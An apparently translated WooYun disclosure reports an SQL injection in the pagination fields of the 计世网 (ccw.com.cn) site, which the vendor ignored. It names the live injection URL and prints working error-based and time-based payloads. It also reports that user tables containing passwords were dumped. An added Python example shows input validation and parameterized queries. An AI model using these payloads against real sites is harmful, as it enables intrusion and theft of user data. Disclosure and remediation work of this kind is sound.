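Vulnerability ID: WooYun-2015-0127819
Title: SQL injection on the 计世网 main site leaks user information (including a large number of accounts and passwords)
Vendor: 计世网
Author: littelfire
Submitted: 2015-07-20 11:40
Disclosed: 2015-07-25 11:42
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: The vendor was notified but ignored the vulnerability
Tags:
2015-07-20: Details sent to the vendor; waiting for the vendor to respond
2015-07-20: The vendor has viewed the report; details are visible to the vendor only
2015-07-25: The vendor has actively ignored the vulnerability; details disclosed to the public
The 计世网 main site has an SQL injection vulnerability.
The 计世网 main site has an SQL injection vulnerability: the database can be dumped and all user information can be obtained.
First, the injection point: http://www.ccw.com.cn/space/eyan_more/11550 post:page=2&pagesize=20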
Parameter: pagesize (POST)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(6581,CONCAT(0x5c,0x71626b6a71,(SELECT (CASE WHEN (6581=6581) THEN 1 ELSE 0 END)),0x71786b7171)),1)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(8607,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x76445476))))),1)
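The injection can be used to extract database information.
The databases can be listed.
Enumerated the 124 tables in the itjia database: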
Dumped some data from the ex_user and ex_member tables.
Filter input properly.
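An added example, not part of the original report or the vendor's code: one way to apply the fix to pagination fields, assuming `pagesize` reaches the SQL `LIMIT` clause by string concatenation (the position of the `PROCEDURE ANALYSE` payload suggests this). The `posts` table, `MAX_PAGESIZE` and all function names are hypothetical, and `sqlite3` stands in for the site's MySQL backend so the block runs offline.

```python
import re
import sqlite3

MAX_PAGESIZE = 100                    # assumed upper bound; the report states none
_DIGITS = re.compile(r"[0-9]{1,6}")   # plain ASCII decimal digits only

def parse_pagination(form):
    """Return (limit, offset) from the POST fields, or raise ValueError."""
    values = {}
    for name, default in (("page", "1"), ("pagesize", "20")):
        raw = form.get(name, default)
        # fullmatch rejects "20 PROCEDURE ANALYSE(...)", "-1", "2e1", " 20", ""
        if not isinstance(raw, str) or not _DIGITS.fullmatch(raw):
            raise ValueError(f"{name} must be a positive integer")
        values[name] = int(raw)
    if values["page"] < 1 or not 1 <= values["pagesize"] <= MAX_PAGESIZE:
        raise ValueError("page or pagesize out of range")
    return values["pagesize"], (values["page"] - 1) * values["pagesize"]

def fetch_page(conn, space_id, form):
    """Run the listing query with every variable part sent as a bound parameter."""
    limit, offset = parse_pagination(form)
    rows = conn.execute(
        "SELECT id, title FROM posts WHERE space_id = ? "
        "ORDER BY id LIMIT ? OFFSET ?",
        (space_id, limit, offset),
    )
    return rows.fetchall()

def demo_db():
    """Constructed in-memory table standing in for the real listing data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE posts (id INTEGER PRIMARY KEY, space_id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO posts (space_id, title) VALUES (?, ?)",
                     [(11550, f"post {i}") for i in range(1, 46)])
    return conn

if __name__ == "__main__":
    conn = demo_db()
    print(len(fetch_page(conn, 11550, {"page": "2", "pagesize": "20"})))
    try:
        # Constructed input with the same shape as the reported payload.
        fetch_page(conn, 11550, {"page": "2", "pagesize": "20 PROCEDURE ANALYSE(1)"})
    except ValueError as exc:
        print("rejected:", exc)
```

The validation and the bound parameters are independent layers: either one alone keeps the trailing SQL out of the statement, and the range check also caps how many rows a single request can pull.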
Severity: no impact (ignored by vendor)
Ignored at: 2015-07-25 11:42
Vulnerability Rank: 15 (WooYun rating)